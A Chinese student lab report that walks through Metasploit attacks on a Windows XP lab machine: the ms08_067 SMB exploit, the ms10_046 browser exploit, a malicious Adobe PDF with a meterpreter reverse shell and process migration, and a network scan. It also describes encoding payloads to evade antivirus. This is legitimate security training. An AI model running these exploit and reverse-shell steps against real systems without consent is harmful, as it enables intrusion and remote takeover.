实验内容
·掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路
·(1)一个主动攻击,如ms08_067;
(2)一个针对浏览器的攻击,如ms11_050;
(3)一个针对客户端的攻击,如Adobe
(4)成功应用任何一个辅助模块。
基础问题回答
解释什么是exploit,payload,encode.
·exploit:相当于弹壳,将攻击包传输到靶机。
·payload: 抵达靶机后,执行攻击方式
·encode:对需要传输的文件进行编码,使自己免杀
实验过程
(1)ms08_067渗透攻击
·kali进入msf
·输入search ms08_067后可以找到渗透模块
·然后输入use exploit/windows/smb/ms08_067_netapi进入该模块
·show payloads显示有效的攻击载荷
·show targets显示可以被攻击的靶机操作系统型号
·set payload generic/shell_reverse_tcp设置有效攻击载荷
·输入set LHOST "kali Ip" set RHOST "Win xp Ip"设置并show options查看payload状态。
·输入exploit开始攻击
·在kali上执行ipconfig/all
·在win xp上执行同样的命令
(2)IE浏览器渗透攻击——MS10046安全漏洞
·先利用search ms10_046查看可用攻击模块
·输入命令use windows/browser/ms10_046_shortcut_icon_dllloader,进入该漏洞模块。
·info查看信息:
·设置好参数并查看,这里SRVHOST和LHOST都为Kali的IP地址:
·开始执行,可以看到生成了一个url
·在靶机的IE浏览器上使用该url进行访问,在Kali上可以看到
·使用sessions指令查看当前存在的会话,可以看到存在一个ID为1的会话:
·使用sessions -i 1选择会话1
·获取shell
(3)Adobe阅读器渗透攻击
·启动msfconsole后输入search adobe寻找可利用漏洞
·输入use exploit/windows/fileformat/adobe_jbig2decode进入该漏洞模块的使用
·使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。
·设置参数
set FILENAME xxx.pdf
set LHOST "KALI Ip"
set LPORT xxxx
·输入exploit,生成pdf文件
·并可以看到pdf所在文件夹,将pdf复制到靶机里。
·使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。
·使用set payload windows/meterpreter/reverse_tcp建立一个反向连接,并将参数设置为攻击模块数据相同
·使用命令exploit开始攻击,在xp中打开pdf,并用sysinfo查看靶机信息
·将进程迁移到explorer.exe.使用ps查看当前进程,并找到explorer.exe的进程号
·使用命令migrate 1884
·输入shell,查看xp靶机信息
·在靶机xp中使用命令netstat -an,看本地tcp连接。
(4)MSF的扫描
·先创建一个msf所需的数据库
·进入msf,输入命令 use auxiliary/scanner/discovery/arp_sweep进入模块
·使用命令,设置
set interface eth0
set RHOSTS 172.30.1.0/21
set threads 2
·run开启扫描,结果可以看到除了自己主机的IP外,还有其他ip
·可以ping通,开启nmap扫描,可以看见开启的端口号,以及目标机的操作系统
实验收获
本次实验更加深入理解了msf的使用,学习到了各种漏洞的寻找以及攻击方式,对于以后防范这些攻击有了基础。